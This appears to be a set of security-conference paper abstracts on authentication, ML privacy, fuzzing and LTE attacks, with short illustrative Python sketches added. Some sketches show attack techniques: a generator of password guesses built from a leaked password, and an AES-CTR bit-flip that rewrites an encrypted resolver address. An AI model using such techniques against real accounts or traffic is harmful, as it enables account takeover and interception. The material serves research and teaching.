We present True2F, a system for second-factor authentication that provides the benefits of conventional authentication tokens in the face of phishing and software compromise, while also providing strong protection against token faults and backdoors. To do so, we develop new lightweight two-party protocols for generating cryptographic keys and ECDSA signatures, and we implement new privacy defenses to prevent cross-origin token-fingerprinting attacks. To facilitate real-world deployment, our system is backwards-compatible with today’s U2F-enabled web services and runs on commodity hardware tokens after a firmware modification. A True2F-protected authentication takes just 57ms to complete on the token, compared with 23ms for unprotected U2F.

Beyond Credential Stuffing: Password Similarity Models using Neural Networks

Attackers increasingly use passwords leaked from one website to compromise associated accounts on other websites. Such targeted attacks work because users reuse, or pick similar, passwords for different websites. We recast one of the core technical challenges underlying targeted attacks as the task of modeling similarity of human-chosen passwords. We show how to learn good password similarity models using a compilation of 1.4 billion leaked (email, password) pairs. Using our trained models of password similarity, we exhibit the most damaging targeted attack to date. Simulations indicate that our attack compromises more than 16% of user accounts in less than a thousand guesses, should one of their other passwords be known to the attacker and despite the use of state-of-the-art countermeasures. We show via a case study involving a large university authentication service that the attacks are also effective in practice. We go on to propose the first-ever defense against such targeted attacks, by way of personalized password strength meters (PPSMs). These are password strength meters that can warn users when they are picking passwords that are vulnerable to attacks, including targeted ones that take advantage of the user’s previously compromised passwords. We design and build a PPSM that can be compressed to less than 3 MB, making it easy to deploy in order to accurately estimate the strength of a password against all known guessing attacks.
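
The paper learns similarity with neural models; the shape of the attack is already visible with hand-written "tweak" rules applied to a leaked password. The sketch below is that rule-based baseline, not the authors' model, and every rule in it is my own illustrative choice.

```python
def tweak_candidates(leaked, limit=1000):
    """Generate guesses 'similar' to a password leaked from another site.
    A hand-written stand-in for a learned password-similarity model."""
    seen, out = set(), []

    def emit(pw):
        if pw and pw not in seen:
            seen.add(pw)
            out.append(pw)

    emit(leaked)
    emit(leaked.capitalize())
    emit(leaked.lower())
    for suffix in ["1", "!", "123", "2019"]:       # common additions/removals
        emit(leaked + suffix)
        if leaked.endswith(suffix):
            emit(leaked[: -len(suffix)])
    emit(leaked.translate(str.maketrans("aeios", "43105")))  # leetspeak
    return out[:limit]

print(tweak_candidates("sunshine1"))
```

A PPSM essentially runs this kind of generator in reverse: it checks whether the password being created sits inside the candidate cloud of the user's already-leaked passwords.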

The 9 Lives of Bleichenbacher’s CAT: New Cache ATtacks on TLS Implementations

At CRYPTO’98, Bleichenbacher published his seminal paper which described a padding oracle attack against RSA implementations that follow the PKCS #1 v1.5 standard. Over the last twenty years researchers and implementors have spent a huge amount of effort in developing and deploying numerous mitigation techniques which were supposed to plug all the possible sources of Bleichenbacher-like leakages. However, as we show in this paper, most implementations are still vulnerable to several novel types of attack based on leakage from various microarchitectural side channels: Out of nine popular implementations of TLS that we tested, we were able to break the security of seven implementations with practical proof-of-concept attacks. We demonstrate the feasibility of using those Cache-like ATtacks (CATs) to perform a downgrade attack against any TLS connection to a vulnerable server, using a BEAST-like Man in the Browser attack. The main difficulty we face is how to perform the thousands of oracle queries required before the browser’s imposed timeout (which is 30 seconds for almost all browsers, with the exception of Firefox which can be tricked into extending this period). Due to its use of adaptive chosen ciphertext queries, the attack seems to be inherently sequential, but we describe a new way to parallelize Bleichenbacher-like padding attacks by exploiting any available number of TLS servers that share the same public key certificate. With this improvement, we can demonstrate the feasibility of a downgrade attack which could recover all the 2048 bits of the RSA plaintext (including the premaster secret value, which suffices to establish a secure connection) from five available TLS servers in under 30 seconds. This sequential-to-parallel transformation of such attacks can be of independent interest, speeding up and facilitating other side channel attacks on RSA implementations.

An Extensive Formal Security Analysis of the OpenID Financial-grade API

Forced by regulations and industry demand, banks worldwide are working to open their customers’ online banking accounts to third-party services via web-based APIs. By using these so-called Open Banking APIs, third-party companies, such as FinTechs, are able to read information about and initiate payments from their users’ bank accounts. Such access to financial data and resources needs to meet particularly high security requirements to protect customers. One of the most promising standards in this segment is the OpenID Financial-grade API (FAPI), currently under development in an open process by the OpenID Foundation and backed by large industry partners. The FAPI is a profile of OAuth 2.0 designed for high-risk scenarios and aiming to be secure against very strong attackers. To achieve this level of security, the FAPI employs a range of mechanisms that have been developed to harden OAuth 2.0, such as Code and Token Binding (including mTLS and OAUTB), JWS Client Assertions, and Proof Key for Code Exchange. In this paper, we perform a rigorous, systematic formal analysis of the security of the FAPI, based on an existing comprehensive model of the web infrastructure - the Web Infrastructure Model (WIM) proposed by Fett, Küsters, and Schmitz. To this end, we first develop a precise model of the FAPI in the WIM, including different profiles for read-only and read-write access, different flows, different types of clients, and different combinations of security features, capturing the complex interactions in a web-based environment. We then use our model of the FAPI to precisely define central security properties. In an attempt to prove these properties, we uncover partly severe attacks, breaking authentication, authorization, and session integrity properties. We develop mitigations against these attacks and finally are able to formally prove the security of a fixed version of the FAPI. Although financial applications are high-stakes environments, this work is the first to formally analyze and, importantly, verify an Open Banking security profile. By itself, this analysis is an important contribution to the development of the FAPI since it helps to define exact security properties and attacker models, and to avoid severe security risks before the first implementations of the standard go live. Of independent interest, we also uncover weaknesses in the aforementioned security mechanisms for hardening OAuth 2.0. We illustrate that these mechanisms do not necessarily achieve the security properties they have been designed for.

Session 8: Machine Learning

Certified Robustness to Adversarial Examples with Differential Privacy

Adversarial examples that fool machine learning models, particularly deep neural networks, have been a topic of intense research interest, with attacks and defenses being developed in a tight back-and-forth. Most past defenses are best effort and have been shown to be vulnerable to sophisticated attacks. Recently a set of certified defenses have been introduced, which provide guarantees of robustness to norm-bounded attacks. However these defenses either do not scale to large datasets or are limited in the types of models they can support. This paper presents the first certified defense that both scales to large networks and datasets (such as Google’s Inception network for ImageNet) and applies broadly to arbitrary model types. Our defense, called PixelDP, is based on a novel connection between robustness against adversarial examples and differential privacy, a cryptographically-inspired privacy formalism, that provides a rigorous, generic, and flexible foundation for defense.
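
A minimal numpy sketch of the mechanism's flavor (the DP certificate derivation is omitted, and the toy linear "network" is mine): add Gaussian noise before the model, average many noisy predictions, and only accept a label if its expected score beats the runner-up by a margin. All sizes and thresholds are illustrative.

```python
import numpy as np

rng = np.random.default_rng(1)
W = rng.normal(size=(3, 10))          # toy 10-feature, 3-class linear model

def noisy_predict(x, sigma=0.5, n_samples=300, margin=0.05):
    """PixelDP-flavored inference: average softmax scores under Gaussian
    input noise and abstain unless the top class clearly wins. The real
    defense turns sigma and the margin into a certified robustness radius
    via differential privacy's post-processing and composition properties."""
    scores = np.zeros(3)
    for _ in range(n_samples):
        z = W @ (x + rng.normal(scale=sigma, size=x.shape))
        scores += np.exp(z) / np.exp(z).sum()    # softmax
    scores /= n_samples
    top, second = np.sort(scores)[-1], np.sort(scores)[-2]
    return int(np.argmax(scores)) if top - second > margin else None

x = rng.normal(size=10)
print(noisy_predict(x))   # class id, or None when too close to certify
```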

DeepSec: A Uniform Platform for Security Analysis of Deep Learning Models

Deep learning (DL) models are inherently vulnerable to adversarial examples – maliciously crafted inputs to trigger target DL models to misbehave – which significantly hinders the application of DL in security-sensitive domains. Intensive research on adversarial learning has led to an arms race between adversaries and defenders. Such a plethora of emerging attacks and defenses raises many questions: Which attacks are more evasive, preprocessing-proof, or transferable? Which defenses are more effective, utility-preserving, or general? Are ensembles of multiple defenses more robust than individuals? Yet, due to the lack of platforms for comprehensive evaluation on adversarial attacks and defenses, these critical questions remain largely unresolved. In this paper, we present the design, implementation, and evaluation of DEEPSEC, a uniform platform that aims to bridge this gap. In its current implementation, DEEPSEC incorporates 16 state-of-the-art attacks with 10 attack utility metrics, and 13 state-of-the-art defenses with 5 defensive utility metrics. To the best of our knowledge, DEEPSEC is the first platform that enables researchers and practitioners to (i) measure the vulnerability of DL models, (ii) evaluate the effectiveness of various attacks/defenses, and (iii) conduct comparative studies on attacks/defenses in a comprehensive and informative manner. Leveraging DEEPSEC, we systematically evaluate the existing adversarial attack and defense methods, and draw a set of key findings, which demonstrate DEEPSEC’s rich functionality, such as (1) the trade-off between misclassification and imperceptibility is empirically confirmed; (2) most defenses that claim to be universally applicable can only defend against limited types of attacks under restricted settings; (3) it is not necessary that adversarial examples with higher perturbation magnitude are easier to detect; (4) the ensemble of multiple defenses cannot improve the overall defense capability, but can improve the lower bound of the defense effectiveness of individuals. Extensive analysis on DEEPSEC demonstrates its capabilities and advantages as a benchmark platform which can benefit future adversarial learning research.

Exploiting Unintended Feature Leakage in Collaborative Learning

Collaborative machine learning and related techniques such as federated learning allow multiple participants, each with his own training dataset, to build a joint model by training locally and periodically exchanging model updates.
We demonstrate that these updates leak unintended information about participants’ training data and develop passive and active inference attacks to exploit this leakage. First, we show that an adversarial participant can infer the presence of exact data points – for example, specific locations – in others’ training data (i.e., membership inference). Then, we show how this adversary can infer properties that hold only for a subset of the training data and are independent of the properties that the joint model aims to capture. For example, he can infer when a specific person first appears in the photos used to train a binary gender classifier.
We evaluate our attacks on a variety of tasks, datasets, and learning configurations, analyze their limitations, and discuss possible defenses.
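
In caricature, property inference reduces to treating observed model updates as feature vectors and training a meta-classifier on updates computed from auxiliary data with and without the property. The synthetic "gradients" below are stand-ins I made up; the paper works with real federated-learning updates.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(2)
DIM = 50

def fake_update(has_property):
    """Stand-in for a participant's model update: batches containing the
    target property shift a few gradient coordinates slightly."""
    g = rng.normal(size=DIM)
    if has_property:
        g[:5] += 0.7
    return g

# The adversary labels updates produced from its own auxiliary data...
X = np.array([fake_update(i % 2 == 0) for i in range(400)])
y = np.array([i % 2 == 0 for i in range(400)])
meta = LogisticRegression(max_iter=1000).fit(X[:300], y[:300])

# ...then infers the property from a victim's observed updates.
print("meta-classifier accuracy:", meta.score(X[300:], y[300:]))
```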

Neural Cleanse: Identifying and Mitigating Backdoor Attacks in Neural Networks

Lack of transparency in deep neural networks (DNNs) makes them susceptible to backdoor attacks, where hidden associations or triggers override normal classification to produce unexpected results. For example, a model with a backdoor always identifies a face as Bill Gates if a specific symbol is present in the input. Backdoors can stay hidden indefinitely until activated by an input, and present a serious security risk to many security- or safety-related applications, e.g. biometric authentication systems or self-driving cars.

We present the first robust and generalizable detection and mitigation system for DNN backdoor attacks. Our techniques identify backdoors and reconstruct possible triggers. We identify multiple mitigation techniques via input filters, neuron pruning and unlearning. We demonstrate their efficacy via extensive experiments on a variety of DNNs, against two types of backdoor injection methods identified by prior work. Our techniques also prove robust against a number of variants of the backdoor attack.
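
Once candidate triggers have been reverse-engineered per label (the optimization step, which is the hard part, is omitted here), the detection step is an outlier test on the trigger L1 norms. A sketch of that step alone, with hypothetical norm values:

```python
import numpy as np

def anomaly_indices(trigger_l1_norms):
    """MAD-based outlier score per label: an infected label tends to need a
    much *smaller* trigger than clean labels. The constant 1.4826 makes the
    median absolute deviation comparable to a standard deviation under
    normality; scores above ~2 are treated as suspicious."""
    norms = np.asarray(trigger_l1_norms, dtype=float)
    med = np.median(norms)
    mad = 1.4826 * np.median(np.abs(norms - med))
    return np.abs(norms - med) / mad

# Hypothetical reversed-trigger norms for a 6-class model; label 3 is tiny.
norms = [95.0, 102.0, 88.0, 12.0, 99.0, 91.0]
for label, s in enumerate(anomaly_indices(norms)):
    flag = "  <-- suspicious" if s > 2 and norms[label] < np.median(norms) else ""
    print(f"label {label}: anomaly index {s:.1f}{flag}")
```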

Helen: Maliciously Secure Coopetitive Learning for Linear Models

Many organizations wish to collaboratively train machine learning models on their combined datasets for a common benefit (e.g., better medical research, or fraud detection). However, they often cannot share their plaintext datasets due to privacy concerns and/or business competition. In this paper, we design and build Helen, a system that allows multiple parties to train a linear model without revealing their data, a setting we call coopetitive learning. Compared to prior secure training systems, Helen protects against a much stronger adversary who is malicious and can compromise m−1 out of m parties. Our evaluation shows that Helen can achieve up to five orders of magnitude of performance improvement when compared to training using an existing state-of-the-art secure multi-party computation framework.

Comprehensive Privacy Analysis of Deep Learning

Deep neural networks are susceptible to various inference attacks as they remember information about their training data. We design white-box inference attacks to perform a comprehensive privacy analysis of deep learning models. We measure the privacy leakage through parameters of fully trained models as well as the parameter updates of models during training. We design inference algorithms for both centralized and federated learning, with respect to passive and active inference attackers, and assuming different adversary prior knowledge. We evaluate our novel white-box membership inference attacks against deep learning algorithms to trace their training data records. We show that a straightforward extension of the known black-box attacks to the white-box setting (through analyzing the outputs of activation functions) is ineffective. We therefore design new algorithms tailored to the white-box setting by exploiting the privacy vulnerabilities of the stochastic gradient descent algorithm, which is the algorithm used to train deep neural networks. We investigate the reasons why deep learning models may leak information about their training data. We then show that even well-generalized models are significantly susceptible to white-box membership inference attacks, by analyzing state-of-the-art pre-trained and publicly available models for the CIFAR dataset. We also show how adversarial participants, in the federated learning setting, can successfully run active membership inference attacks against other participants, even when the global model achieves high prediction accuracies.
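
For intuition only, here is the simple loss-threshold baseline for membership inference (not the paper's white-box gradient attacks, which it shows are much stronger): training members tend to have lower loss than non-members, so thresholding per-example loss already separates them on overfit models. The loss distributions below are synthetic stand-ins.

```python
import numpy as np

def member_guess(losses, threshold):
    """Predict 'member' when the model's loss on the example is low."""
    return losses < threshold

rng = np.random.default_rng(3)
# Stand-in per-example cross-entropy losses from an overfit model:
member_losses = rng.gamma(shape=1.0, scale=0.3, size=1000)      # low
nonmember_losses = rng.gamma(shape=2.0, scale=0.8, size=1000)   # higher

losses = np.concatenate([member_losses, nonmember_losses])
truth = np.concatenate([np.ones(1000, bool), np.zeros(1000, bool)])
pred = member_guess(losses, threshold=np.median(losses))
print("attack accuracy:", (pred == truth).mean())
```

The paper's point is that even when this black-box signal is weak (well-generalized models), white-box signals extracted from SGD's gradients still leak membership.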

Session 9: Fuzzing

Razzer: Finding Kernel Race Bugs through Fuzzing

A data race in a kernel is an important class of bugs, critically impacting the reliability and security of the associated system. As a result of a race, the kernel may become unresponsive. Even worse, an attacker may launch a privilege escalation attack to acquire root privileges.
In this paper, we propose Razzer, a tool to find race bugs in kernels. The core of Razzer is in guiding fuzz testing towards potential data race spots in the kernel. Razzer employs two techniques to find races efficiently: a static analysis and a deterministic thread interleaving technique. Using a static analysis, Razzer identifies over-approximated potential data race spots, guiding the fuzzer to search for data races in the kernel more efficiently. Using the deterministic thread interleaving technique implemented at the hypervisor, Razzer tames the non-deterministic behavior of the kernel such that it can deterministically trigger a race. We implemented a prototype of Razzer and ran it on recent Linux kernels (from v4.16-rc3 to v4.18-rc3). As a result, Razzer discovered 30 new races in the kernel, with 16 subsequently confirmed and accordingly patched by kernel developers after they were reported.

ProFuzzer: On-the-fly Input Type Probing for Better Zero-day Vulnerability Discovery

Existing mutation-based fuzzers tend to randomly mutate the input of a program without understanding its underlying syntax and semantics. In this paper, we propose a novel on-the-fly probing technique (called ProFuzzer) that automatically recovers and understands input fields of critical importance to vulnerability discovery during a fuzzing process and intelligently adapts the mutation strategy to enhance the chance of hitting zero-day targets. Since such probing is transparently piggybacked to the regular fuzzing, no prior knowledge of the input specification is needed. During fuzzing, individual bytes are first mutated and their fuzzing results are automatically analyzed to link those related together and identify the type for the field connecting them; these bytes are further mutated together following type-specific strategies, which substantially prunes the search space. We define the probe types generally across all applications, thereby making our technique application agnostic. Our experiments on standard benchmarks and real-world applications show that ProFuzzer substantially outperforms AFL and its optimized version AFLFast, as well as other state-of-the-art fuzzers including VUzzer, Driller and QSYM. Within two months, it exposed 42 zero-days in 10 intensively tested programs, generating 30 CVEs.
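
A toy rendering of the probing idea (the `run_target` coverage oracle below is a stub I made up, and a real tool sweeps all 256 byte values): mutate one byte at a time, record how coverage reacts, and group adjacent bytes with identical reaction profiles into one inferred field to be mutated together.

```python
def run_target(data: bytes) -> frozenset:
    """Hypothetical coverage oracle: returns the set of edges an input hits.
    Faked here so bytes 0-3 act as a magic header and bytes 4-7 as a size."""
    edges = {0}
    if data[:4] == b"FUZZ":
        edges.add(1)
        if int.from_bytes(data[4:8], "little") < len(data):
            edges.add(2)
    return frozenset(edges)

def probe_fields(seed: bytes):
    """Per-byte probing: a byte's profile is the tuple of coverage sets seen
    while sweeping it through a few values; identical adjacent profiles are
    merged into one field."""
    profiles = []
    for i in range(len(seed)):
        profile = []
        for v in (0x00, 0x41, 0xFF):       # coarse sweep for brevity
            mutated = seed[:i] + bytes([v]) + seed[i + 1:]
            profile.append(run_target(mutated))
        profiles.append(tuple(profile))
    fields, start = [], 0
    for i in range(1, len(profiles) + 1):
        if i == len(profiles) or profiles[i] != profiles[start]:
            fields.append((start, i - 1))
            start = i
    return fields

# Recovers three fields: magic header (0-3), size (4-7), payload (8-11).
print(probe_fields(b"FUZZ\x04\x00\x00\x00rest"))
```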

Full-speed Fuzzing: Reducing Fuzzing Overhead through Coverage-guided Tracing

Coverage-guided fuzzing is one of the most successful approaches for discovering software bugs and security vulnerabilities. Of its three main components: (1) test case generation, (2) code coverage tracing, and (3) crash triage, code coverage tracing is a dominant source of overhead. Coverage-guided fuzzers trace every test case’s code coverage through either static or dynamic binary instrumentation, or more recently, using hardware support. Unfortunately, tracing all test cases incurs significant performance penalties—even when the overwhelming majority of test cases and their coverage information are discarded because they do not increase code coverage. To eliminate needless tracing by coverage-guided fuzzers, we introduce the notion of coverage-guided tracing. Coverage-guided tracing leverages two observations: (1) only a fraction of generated test cases increase coverage, and thus require tracing; and (2) coverage-increasing test cases become less frequent over time. Coverage-guided tracing encodes the current frontier of coverage in the target binary so that it self-reports when a test case produces new coverage—without tracing. This acts as a filter for tracing, restricting the expense of tracing to only coverage-increasing test cases. Thus, coverage-guided tracing trades increased time handling coverage-increasing test cases for decreased time handling non-coverage-increasing test cases. To show the potential of coverage-guided tracing, we create an implementation based on the static binary instrumentor Dyninst called UnTracer. We evaluate UnTracer using eight real-world binaries commonly used by the fuzzing community. Experiments show that after only an hour of fuzzing, UnTracer’s average overhead is below 1%, and after 24 hours of fuzzing, UnTracer approaches 0% overhead, while tracing every test case with popular white- and black-box binary tracers AFL-Clang, AFL-QEMU, and AFL-Dyninst incurs overheads of 36%, 612%, and 518%, respectively. We further integrate UnTracer with the state-of-the-art hybrid fuzzer QSYM and show that in 24 hours of fuzzing, QSYM-UnTracer executes 79% and 616% more test cases than QSYM-Clang and QSYM-QEMU, respectively.
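(Removed.)

The control loop is simple to sketch. In the simulation below, `blocks_hit`, `run_interest_oracle`, and `run_traced` are toy stand-ins I wrote for the two instrumented binaries, not UnTracer's actual interfaces:

```python
import os

COVERED = set()   # frontier of basic blocks covered so far

def blocks_hit(testcase) -> set:
    """Toy stand-in for the target: each input hits a few block ids of 50."""
    return {hash((testcase, i)) % 50 for i in range(3)}

def run_interest_oracle(testcase) -> bool:
    """Stand-in for the cheap self-reporting binary. In UnTracer this is the
    target with an interrupt planted on every still-uncovered block, so it
    runs at native speed unless new coverage is actually reached."""
    return any(b not in COVERED for b in blocks_hit(testcase))

def run_traced(testcase) -> set:
    """Stand-in for the fully traced (e.g., Dyninst-instrumented) run."""
    return blocks_hit(testcase)

def fuzz_loop(testcases):
    traced = 0
    for tc in testcases:
        if not run_interest_oracle(tc):    # common case: no tracing cost
            continue
        traced += 1
        COVERED.update(run_traced(tc))     # real UnTracer also removes the
                                           # interrupts on newly hit blocks
    print(f"traced {traced} of {len(testcases)} test cases")

fuzz_loop([os.urandom(8) for _ in range(10000)])
```

Running it shows the paper's second observation directly: once coverage saturates, almost no test case pays the tracing cost.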

NEUZZ: Efficient Fuzzing with Neural Program Smoothing

Fuzzing has become the de facto standard technique for finding software vulnerabilities. However, even state-of-the-art fuzzers are not very efficient at finding hard-to-trigger software bugs. Most popular fuzzers use evolutionary guidance to generate inputs that can trigger different bugs. Such evolutionary algorithms, while fast and simple to implement, often get stuck in fruitless sequences of random mutations. Gradient-guided optimization presents a promising alternative to evolutionary guidance. Gradient-guided techniques have been shown to significantly outperform evolutionary algorithms at solving high-dimensional structured optimization problems in domains like machine learning by efficiently utilizing gradients or higher-order derivatives of the underlying function.

However, gradient-guided approaches are not directly applicable to fuzzing as real-world program behaviors contain many discontinuities, plateaus, and ridges where the gradient-based methods often get stuck. We observe that this problem can be addressed by creating a smooth surrogate function approximating the target program’s discrete branching behavior. In this paper, we propose a novel program smoothing technique using surrogate neural network models that can incrementally learn smooth approximations of a complex, real-world program’s branching behaviors. We further demonstrate that such neural network models can be used together with gradient-guided input generation schemes to significantly increase the efficiency of the fuzzing process.

Our extensive evaluations demonstrate that NEUZZ significantly outperforms 10 state-of-the-art graybox fuzzers on 10 popular real-world programs both at finding new bugs and achieving higher edge coverage. NEUZZ found 31 previously unknown bugs (including two CVEs) that other fuzzers failed to find in 10 real-world programs and achieved 3X more edge coverage than all of the tested graybox fuzzers over 24-hour runs. Furthermore, NEUZZ also outperformed existing fuzzers on both LAVA-M and DARPA CGC bug datasets.
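
The gradient-guided step can be sketched with a one-layer surrogate in plain numpy (the surrogate, its random weights, and the target edge are all toy stand-ins; NEUZZ trains a real NN on observed coverage bitmaps and backpropagates through it): take the gradient of a target edge's predicted probability with respect to the input bytes, and mutate the highest-gradient positions first.

```python
import numpy as np

rng = np.random.default_rng(4)
IN, EDGES = 32, 64                            # input bytes, bitmap width
W = rng.normal(scale=0.1, size=(EDGES, IN))   # toy "trained" surrogate
b = np.zeros(EDGES)

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def edge_gradient(x, edge):
    """d sigmoid(W[edge] @ x + b[edge]) / dx, analytic for one layer.
    NEUZZ obtains the same quantity by backprop through its trained NN."""
    s = sigmoid(W[edge] @ x + b[edge])
    return s * (1 - s) * W[edge]

def mutate(seed_bytes, edge, k=4):
    """Nudge the k bytes with the largest |gradient| toward the sign that
    increases the surrogate's probability of hitting `edge`."""
    x = np.frombuffer(seed_bytes, dtype=np.uint8).astype(float) / 255.0
    g = edge_gradient(x, edge)
    out = bytearray(seed_bytes)
    for i in np.argsort(-np.abs(g))[:k]:
        out[i] = 255 if g[i] > 0 else 0
    return bytes(out)

seed = bytes(rng.integers(0, 256, IN, dtype=np.uint8))
print(mutate(seed, edge=7).hex())
```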

Fuzzing File Systems via Two-Dimensional Input Space Exploration

File systems, a basic building block of an OS, are too big and too complex to be bug free. Nevertheless, file systems rely on regular stress-testing tools and formal checkers to find bugs, which are limited due to the ever-increasing complexity of both file systems and OSes. Thus, fuzzing, proven to be an effective and a practical approach, becomes a preferable choice, as it does not need much knowledge about a target. However, three main challenges exist in fuzzing file systems: mutating a large image blob that degrades overall performance, generating image-dependent file operations, and reproducing found bugs, which is difficult for existing OS fuzzers.
Hence, we present JANUS, the first feedback-driven fuzzer that explores the two-dimensional input space of a file system, i.e., mutating metadata on a large image, while emitting image-directed file operations. In addition, JANUS relies on a library OS rather than on traditional VMs for fuzzing, which enables JANUS to load a fresh copy of the OS, thereby leading to better reproducibility of bugs. We evaluate JANUS on eight file systems and found 90 bugs in the upstream Linux kernel, 62 of which have been acknowledged. Forty-three bugs have been fixed with 32 CVEs assigned. In addition, JANUS achieves higher code coverage on all the file systems after 12 hours of fuzzing, when compared with the state-of-the-art fuzzer Syzkaller for fuzzing file systems. JANUS visits 4.19x and 2.01x more code paths in Btrfs and ext4, respectively. Moreover, JANUS is able to reproduce 88–100% of the crashes, while Syzkaller fails on all of them.

Session 13: Network Security

Breaking LTE on Layer Two

Long Term Evolution (LTE) is the latest mobile communication standard and has a pivotal role in our information society: LTE combines performance goals with modern security mechanisms and serves casual use cases as well as critical infrastructure and public safety communications. Both scenarios demand a resilient and secure specification and implementation of LTE, as outages and open attack vectors potentially lead to severe risks. Previous work on LTE protocol security identified crucial attack vectors for both the physical (layer one) and network (layer three) layers. Data link layer (layer two) protocols, however, remain a blind spot in existing LTE security research.
In this paper, we present a comprehensive layer two security analysis and identify three attack vectors. These attacks impair the confidentiality and/or privacy of LTE communication. More specifically, we first present a passive identity mapping attack that matches volatile radio identities to longer lasting network identities, enabling us to identify users within a cell and serving as a stepping stone for follow-up attacks. Second, we demonstrate how a passive attacker can abuse the resource allocation as a side channel to perform website fingerprinting that enables the attacker to learn the websites a user accessed. Finally, we present the aLTEr attack that exploits the fact that LTE user data is encrypted in counter mode (AES-CTR) but not integrity protected, which allows us to modify the message payload. As a proof-of-concept demonstration, we show how an active attacker can redirect DNS requests and then perform a DNS spoofing attack. As a result, the user is redirected to a malicious website. Our experimental analysis demonstrates the real-world applicability of all three attacks and emphasizes the threat of open attack vectors on LTE layer two protocols.
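
The core fact behind aLTEr, that AES-CTR without integrity protection is malleable, fits in a few lines (the key and strings below are toys; the real attack flips bits in an encrypted DNS packet over the air): XORing a ciphertext with `known_plaintext XOR target_plaintext` makes it decrypt to the attacker's choice, with no key needed.

```python
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key, nonce = os.urandom(16), os.urandom(16)

def ctr(data: bytes) -> bytes:
    """AES-CTR is its own inverse for a fixed key/counter stream."""
    enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    return enc.update(data) + enc.finalize()

known = b"resolver=8.8.8.8"           # plaintext the attacker can predict
target = b"resolver=6.6.6.6"          # what the attacker wants instead
ct = ctr(known)                        # what goes over the air

mask = bytes(a ^ b for a, b in zip(known, target))
tampered = bytes(c ^ m for c, m in zip(ct, mask))   # flip bits, no key

print(ctr(tampered))                   # b'resolver=6.6.6.6'
```

Integrity protection (a MAC or AEAD mode) is exactly what makes such a tampered ciphertext detectable, which is the countermeasure the paper argues for.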

HOLMES: Real-time APT Detection through Correlation of Suspicious Information Flows

In this paper, we present HOLMES, a system that implements a new approach to the detection of Advanced and Persistent Threats (APTs). HOLMES is inspired by several case studies of real-world APTs that highlight some common goals of APT actors. In a nutshell, HOLMES aims to produce a detection signal that indicates the presence of a coordinated set of activities that are part of an APT campaign. One of the main challenges addressed by our approach involves developing a suite of techniques that make the detection signal robust and reliable. At a high-level, the techniques we develop effectively leverage the correlation between suspicious information flows that arise during an attacker campaign. In addition to its detection capability, HOLMES is also able to generate a high-level graph that summarizes the attacker’s actions in real-time. This graph can be used by an analyst for an effective cyber response. An evaluation of our approach against some real-world APTs indicates that HOLMES can detect APT campaigns with high precision and low false alarm rate. The compact high-level graphs produced by HOLMES effectively summarize an ongoing attack campaign and can assist real-time cyber-response operations.

Touching the Untouchables: Dynamic Security Analysis of the LTE Control Plane

This paper presents our extensive investigation of the security aspects of control plane procedures based on dynamic testing of the control components in operational Long Term Evolution (LTE) networks. For dynamic testing in LTE networks, we implemented a semi-automated testing tool, named LTEFuzz, by using open-source LTE software over which the user has full control. We systematically generated test cases by defining three basic security properties by closely analyzing the standards. Based on the security property, LTEFuzz generates and sends the test cases to a target network, and classifies the problematic behavior by only monitoring the device-side logs. Accordingly, we uncovered 36 vulnerabilities, which have not been disclosed previously. These findings are categorized into five types: Improper handling of (1) unprotected initial procedure, (2) crafted plain requests, (3) messages with invalid integrity protection, (4) replayed messages, and (5) security procedure bypass. We confirmed those vulnerabilities by demonstrating proof-of-concept attacks against operational LTE networks. The impact of the attacks is to either deny LTE services to legitimate users, spoof SMS messages, or eavesdrop/manipulate user data traffic. Precise root cause analysis and potential countermeasures to address these problems are presented as well. Cellular carriers were partially involved to maintain ethical standards as well as verify our findings in commercial LTE networks.

On the Feasibility of Rerouting-Based DDoS Defenses

Large botnet-based flooding attacks have recently demonstrated unprecedented damage. However, the best-known end-to-end availability guarantees against flooding attacks require costly global-scale coordination among autonomous systems (ASes). A recent proposal called routing around congestion (or RAC) attempts to offer strong end-to-end availability to a selected critical flow by dynamically rerouting it to an uncongested detour path without requiring any inter-AS coordination. This paper presents an in-depth analysis of the (in)feasibility of the RAC defense and points out that its rerouting approach, though intriguing, cannot possibly solve the challenging flooding problem. An effective RAC solution should find an inter-domain detour path for its critical flow with the two following desired properties: (1) it guarantees the establishment of an arbitrary detour path of its choice, and (2) it isolates the established detour path from non-critical flows so that the path is used exclusively for its critical flow. However, we show a fundamental trade-off between the two desired properties, and as a result, only one of them can be achieved but not both. Worse yet, we show that failing to achieve either of the two properties makes the RAC defense not just ineffective but nearly unusable. When the newly established detour path is not isolated, a new adaptive adversary can detect it in real time and immediately congest the path, defeating the goals of the RAC defense. Conversely, when the establishment of an arbitrary detour path is not guaranteed, more than 80% of critical flows we test have only a small number (e.g., three or less) of detour paths that can actually be established and disjoint from each other, which significantly restricts the available options for the reliable RAC operation. The first lesson of this study is that BGP-based rerouting solutions in the current inter-domain infrastructure seem to be impractical due to implicit assumptions (e.g., the invisibility of poisoning messages) that are unattainable in BGP’s current practice. Second, we learn that the analysis of protocol specifications alone is insufficient for the feasibility study of any new defense proposal and, thus, additional rigorous security analysis and various network evaluations, including real-world testing, are required. Finally, our findings in this paper agree well with the conclusion of the major literature about end-to-end guarantees; that is, strong end-to-end availability should be a security feature of the Internet routing by design, not an ad hoc feature obtained via exploiting current routing protocols.

Resident Evil: Understanding Residential IP Proxy as a Dark Service

An emerging Internet business is residential proxy (RESIP) as a service, in which a provider utilizes the hosts within residential networks (in contrast to those running in a datacenter) to relay their customers’ traffic, in an attempt to avoid server-side blocking and detection. With the prominent roles the services could play in the underground business world, little has been done to understand whether they are indeed involved in Cybercrimes and how they operate, due to the challenges in identifying their RESIPs, not to mention any in-depth analysis on them.
In this paper, we report the first study on RESIPs, which sheds light on the behaviors and the ecosystem of these elusive gray services. Our research employed an infiltration framework, including our clients for RESIP services and the servers they visited, to detect 6 million RESIP IPs across 230+ countries and 52K+ ISPs. The observed addresses were analyzed and the hosts behind them were further fingerprinted using a new profiling system. Our effort led to several surprising findings about the RESIP services unknown before. Surprisingly, despite the providers’ claim that the proxy hosts are willingly joined, many proxies run on likely compromised hosts including IoT devices. By cross-matching the hosts we discovered against labeled PUP (potentially unwanted program) logs provided by a leading IT company, we uncovered various illicit operations RESIP hosts performed, including illegal promotion, fast fluxing, phishing, malware hosting, and others. We also reverse engineered RESIP services’ internal infrastructures, and uncovered their potential rebranding and reselling behaviors. Our research takes the first step toward understanding this new Internet service, contributing to the effective control of their security risks.

Session 15: Web and Cloud Security

